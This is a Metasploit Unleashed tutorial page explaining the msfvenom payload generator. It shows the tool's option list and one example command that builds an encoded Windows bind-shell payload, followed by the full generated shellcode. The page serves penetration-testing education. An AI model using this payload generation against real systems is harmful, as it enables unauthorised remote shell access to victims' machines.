Msfvenom

From Metasploit Unleashed - Mastering The Framework

Jump to: navigation, search

msfvenom is a combination of msfpayload and msfencode, putting both of these tools into a single framework instance. The advantages of msfvenom are:

  • One single tool
  • Standardized command line options
  • Increased speed

At this point msfvenom is still in it's infancy but has many options: 

root@bt:~# /pentest/exploits/framework3/msfvenom -h
Usage: /pentest/exploits/framework3/msfvenom [options] 

Options:
    -p, --payload    [payload]       Payload to use. Specify a '-' or stdin to use custom payloads
    -l, --list       [module_type]   List a module type example: payloads, encoders, nops, all
    -n, --nopsled    [length]        Prepend a nopsled of [length] size on to the payload
    -f, --format     [format]        Format to output results in: raw, ruby, rb, perl, pl, c, js_be, js_le, java, dll, exe, exe-small, elf, macho, vba, vbs, loop-vbs, asp, war
    -e, --encoder    [encoder]       The encoder to use
    -a, --arch       [architecture]  The architecture to use
        --platform   [platform]
                                     The platform of the payload
    -s, --space      [length]        The maximum size of the resulting payload
    -b, --bad-chars  [list]          The list of characters to avoid example: '\x00\xff'
    -i, --iterations [count]         The number of times to encode the payload
    -x, --template   [path]          Specify a custom executable file to use as a template
    -k, --keep                       Preserve the template behavior and inject the payload as a new thread
    -h, --help                       Show this message
An example of the usage of msfvenom can be seen below: 

root@bt:~# /pentest/exploits/framework3/msfvenom -p windows/shell/bind_tcp -e x86/shikata_ga_nai -b '\x00' -i 3
[*] x86/shikata_ga_nai succeeded with size 325 (iteration=1)
[*] x86/shikata_ga_nai succeeded with size 352 (iteration=2)
[*] x86/shikata_ga_nai succeeded with size 379 (iteration=3)
buf = 
"\xdb\xdb\xbe\x0a\x3a\xfc\x6d\xd9\x74\x24\xf4\x5a\x29\xc9" +
"\xb1\x52\x31\x72\x18\x83\xea\xfc\x03\x72\x1e\xd8\x09\xb6" +
"\xce\xc5\x86\x6d\x1a\xa8\xd8\x88\xa8\xbc\x51\x64\xe5\xf2" +
"\xd1\xb7\x80\xed\x66\x72\x6e\x0d\x1c\x68\x6a\xae\xcd\x0e" +
"\x33\x90\x1d\x73\x82\xd8\xd7\xe0\x87\x76\xbd\x25\xf4\x23" +
"\x4d\x38\xc2\xc3\xe9\xa1\x7e\x31\xc5\xe4\x84\x2a\x3b\x37" +
"\xb3\xd6\x13\xc4\x09\x89\xd0\x95\x21\x10\x6b\x83\x94\x3d" +
"\xf2\xfd\x19\x36\x18\xc4\x0a\x45\x51\x12\xda\x65\x29\xfb" +
"\x8a\xdf\x29\x16\x88\xb9\x85\x9d\x55\x2b\x6e\x05\x60\xc9" +
"\x07\x2d\x3c\x33\xf7\xac\x6c\xbf\x4b\x6d\x91\x35\x29\x59" +
"\x38\xfe\x18\x38\x12\x72\xd4\x1d\xbd\x6d\x05\x79\xa6\x4e" +
"\x58\xb0\x4a\x0e\x4c\x05\x5e\x51\x45\x70\xdc\x90\x93\xa9" +
"\x21\x99\xd6\xab\xa7\x04\x11\x5d\x0e\x21\xa0\x96\xdd\x1f" +
"\x86\x39\x71\xab\xb1\x87\x58\xb3\xd1\x3a\x2d\x5f\xb3\x6f" +
"\xd0\xb1\x01\xf0\xed\x1c\x9f\x87\x59\x3d\x98\x80\xbb\x6d" +
"\xa8\x7e\x17\xc4\x3c\xb4\xef\x3c\x48\xbe\x07\x51\x04\x9f" +
"\x6f\xaf\xff\x16\xdc\x66\x77\xb4\x11\x00\xae\x0a\x66\x7b" +
"\x28\x2b\xd3\x19\x3e\xcb\x98\xbf\xfd\x7b\x14\x7a\xbf\xa2" +
"\x06\x46\x90\x19\x71\x6d\x28\xf5\x1c\xe5\x9c\x40\x88\x48" +
"\x5d\xe2\x89\xb2\xba\x21\x7b\xdb\xe1\x60\x70\x1e\x55\x93" +
"\x22\xf3\x6d\xbf\x5b\xc3\x74\x1e\x49\x43\x05\xdf\xdf\x9f" +
"\x3a\x9f\x80\xfe\xed\x8a\xa5\xf7\x09\xf5\xf8\x6b\x24\xbb" +
"\x20\x28\xfc\x03\x9a\xeb\xcf\x23\xbc\x50\xec\xca\x34\x3c" +
"\x58\x94\x18\xcb\x51\x71\x19\x5f\x2d\xbf\x58\x45\x86\x29" +
"\xb3\x9a\x87\x85\xf5\x40\x1d\xc6\x72\xbb\x3d\x60\x79\x3f" +
"\xff\xc7"

The command and resulting shellcode above generates a Windows bind shell with three iterations of the shikata_ga_nai encoder without any null bytes in our shellcode.



Exploit Payloads



Retrieved from "http://www.offensive-security.com/metasploit-unleashed/Msfvenom"
Personal tools